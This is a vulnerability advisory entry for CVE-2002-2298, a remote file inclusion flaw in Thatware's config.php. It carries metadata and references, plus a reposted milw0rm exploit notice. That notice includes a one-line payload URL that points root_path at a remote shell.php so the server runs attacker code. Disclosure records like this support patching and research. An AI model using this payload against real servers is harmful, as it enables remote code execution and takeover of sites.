Thatware Vulnerability

Vulnerability ID: 1110802 | Vulnerability type: Code injection
Published: 2006-08-10 | Updated: 2006-08-10
CVE ID: CVE-2002-2298 | CNNVD-ID: CNNVD-200212-151
Platform: PHP | CVSS score: 6.8
|Vulnerability Source
https://www.exploit-db.com/exploits/2166
https://www.securityfocus.com/bid/86674
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200212-151
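|Vulnerability Details
PHP remote file inclusion vulnerability in config.php in Thatware versions 0.3 through 0.5.3. Remote attackers can execute arbitrary PHP code via the root_path parameter.
|Exploit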
Thatware  0.4.6 (root_path) Remote File Inclusion

CreW: ToXiC

Bug Found by Drago84

Source Code:
http://ufpr.dl.sourceforge.net/sourceforge/thatware/thatware_0.4.6.tar.gz

Page Affect
config.php

ExP:
http://server/dir_thatware/config.php?root_path=http://server/shell.php'

Greatz: str0ke

# milw0rm.com [2006-08-10]
|Affected Products
Atthat.Com Thatware 0.5.3
|References

Source: XF
Name: thatware-php-file-include(10758)
Link: http://xforce.iss.net/xforce/xfdb/10758
Source: SECTRACK
Name: 1005733
Link: http://securitytracker.com/id?1005733
Source: BUGTRAQ
Name: 20021201Thatware(PHP)
Link: http://archives.neohapsis.com/archives/bugtraq/2002-12/0000.html